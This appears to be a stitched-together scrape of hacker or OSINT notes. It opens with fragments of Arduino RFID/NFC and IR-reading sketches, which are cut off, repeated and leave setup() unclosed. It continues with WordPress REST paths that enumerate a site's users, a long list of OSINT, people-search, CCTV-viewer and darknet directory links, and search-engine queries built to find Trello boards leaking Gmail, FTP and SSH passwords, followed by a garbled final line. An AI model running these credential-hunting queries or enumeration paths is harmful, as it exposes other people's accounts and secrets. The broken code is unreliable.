rfid.PICC_HaltA(); // Halt the tag and prepare to read a new one
}
}
#include <Wire.h>
#include <Adafruit_PN532.h>
void setup(void) {
Serial.begin(9600);
void loop(void) {
uint8_t success;
uint8_t uid[] = {0, 0, 0, 0, 0, 0, 0};
uint8_t uidLength;
#include <Wire.h>
#include <Adafruit_PN532.h>
void setup(void) {
Serial.begin(115200);
while (!Serial) delay(10); // for Leonardo/Micro/Zero
nfc.begin();
nfc.setPassiveActivationRetries(0xFF);
nfc.SAMConfig();
}
void loop(void) {
uint8_t success;
uint8_t uid[] = { 0, 0, 0, 0, 0, 0, 0 }; // Buffer to store the returned UID
uint8_t uidLength; // Length of the UID (4 or 7 bytes depending
// Wait for an ISO14443A type card (Mifare, etc.). When one is found, 'uid' will be pop
success = nfc.readPassiveTargetID(PN532_MIFARE_ISO14443A, &uid[0], &uidLength);
if (success) {
Serial.println("Found an ISO14443A card");
Serial.print("UID Length: ");Serial.print(uidLength, DEC);Serial.println(" bytes");
Serial.print("UID Value: ");
for (uint8_t i=0; i < uidLength; i++) {
Serial.print(" 0x");Serial.print(uid[i], HEX);
}
Serial.println("");
uint8_t data[] = { 0x01, 0x23, 0x45, 0x67 }; // Data to write to the tag
uint8_t dataLength = sizeof(data);
}
}
#include <IRremote.h>
void loop()
{
if (irrecv.decode(&results))
{
Serial.println(results.value, HEX);
irrecv.resume(); // Receive the next value
}
}
{site}/wp-json/wp/v2/users
{site}/wp-json/wp/v2/posts/?per_page=100&page=1
- https://rocketreach.co/browser_extension
- https://contactout.com/
- https://app.getprospect.com/303197/contacts/filter/all
### tools:
- https://github.com/josh0xA/darkdump
- https://www.maltego.com/transform-hub/image-analyzer/
- https://github.com/mxrch/GitFive
- https://github.com/matiash26/Steam-OSINT-TOOL
- https://github.com/C3n7ral051nt4g3ncy/Masto
- https://github.com/jordanwildon/Telepathy
- https://gchq.github.io/CyberChef/
- https://chrome.google.com/webstore/detail/selection-search/gipnlpdeieaidmmeaichnddnmj
- https://addons.mozilla.org/en-GB/firefox/addon/selection-search-ff
- https://inteltechniques.com/tools/
- https://github.com/novitae/emdofi
- https://seintpl.github.io/NAMINT/
- https://github.com/Genymobile/scrcpy
- https://github.com/novitae/sterraxcyl
- https://github.com/tejado/telegram-nearby-map
- https://lnkd.in/f6hqpg6
- https://cheatography.com/explore/search/?q=Sherlock
- https://github.com/megadose/holehe
- https://github.com/mxrch/GHunt
### cctv
- http://www.insecam.org/en/view/1006815/
- https://cctv.masspirates.org/
- https://railwebcams.net/
### certificate
- https://www.aware-online.com/en/our-customers/
### book
- Psychology of Intelligence Analysis
### linkedin
- https://theorg.com/organizations
- https://www.importyeti.com/company/apple
- https://github.com/chm0dx/peepedIn
- https://start.me/p/PwmvMv/main
- https://start.me/p/rx6Qj8/nixintel-s-osint-resource-list
- https://start.me/p/1kJKR9
- https://start.me/p/aLe0vp/osint-resources-in-canada
- https://metaosint.github.io/table
- https://start.me/p/1kBrw9/sans-osint-2022
- https://map.malfrats.industries/
- https://start.me/p/9E2mea/linux-tools
- https://start.me/p/lLBdE6/ukraine-crisis-tracker
- https://airtable.com/embed/shrYXDdO1V5y33lIX/tblgDtMXI4fxtg9Op
- https://start.me/p/1kvvxN/
- https://tor.taxi/
- https://dark.fail/
```text
inurl:https://trello.com AND intext:@gmail.com AND intext:password
inurl:https://trello.com AND intext:ftp AND intext:password
inurl:https://trello.com AND intext:ssh AND intext:password
i l ji AND i titl l i AND i l [ ]